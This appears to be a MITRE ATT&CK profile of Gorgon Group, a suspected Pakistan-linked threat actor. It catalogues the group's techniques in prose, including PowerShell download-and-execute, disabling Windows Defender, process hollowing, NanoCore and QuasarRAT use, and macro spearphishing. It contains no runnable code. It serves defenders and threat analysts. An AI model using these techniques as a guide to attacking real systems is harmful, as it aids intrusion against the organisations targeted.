Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [1]

ID: G0078
Aliases: Gorgon Group
Version: 1.0

Alias Descriptions

Gorgon Group[1]

Techniques Used

EnterpriseT1059Command-Line InterfaceGorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.[1]
EnterpriseT1140Deobfuscate/Decode Files or InformationGorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file.[1]
EnterpriseT1089Disabling Security ToolsGorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command.[1]
EnterpriseT1106Execution through APIGorgon Group malware can leverage the Windows API call, CreateProcessA(), for execution.[1]
EnterpriseT1112Modify RegistryGorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\Software\Microsoft\Office\.[1]
EnterpriseT1086PowerShellGorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.[1]
EnterpriseT1093Process HollowingGorgon Group malware can use process hollowing to inject one of its trojans into another process.[1]
EnterpriseT1055Process InjectionGorgon Group malware can download a remote access tool, NanoCore, and inject into another process.[1]
EnterpriseT1060Registry Run Keys / Startup FolderGorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.[1]
EnterpriseT1105Remote File CopyGorgon Group malware can download additional files from C2 servers.[1]
EnterpriseT1064ScriptingGorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines.[1]
EnterpriseT1023Shortcut ModificationGorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.[1]
EnterpriseT1193Spearphishing AttachmentGorgon Group sent emails to victims with malicious Microsoft Office documents attached.[1]
EnterpriseT1065Uncommonly Used PortGorgon Group has used a variant of NanoCore RAT that communicates with its C2 server over port 6666.[1]
EnterpriseT1204User ExecutionGorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.[1]


S0262QuasarRATCode Signing, Command-Line Interface, Connection Proxy, Credential Dumping, Credentials in Files, Input Capture, Masquerading, Modify Registry, Remote Desktop Protocol, Remote File Copy, Scheduled Task, Standard Cryptographic Protocol, System Information Discovery, Video Capture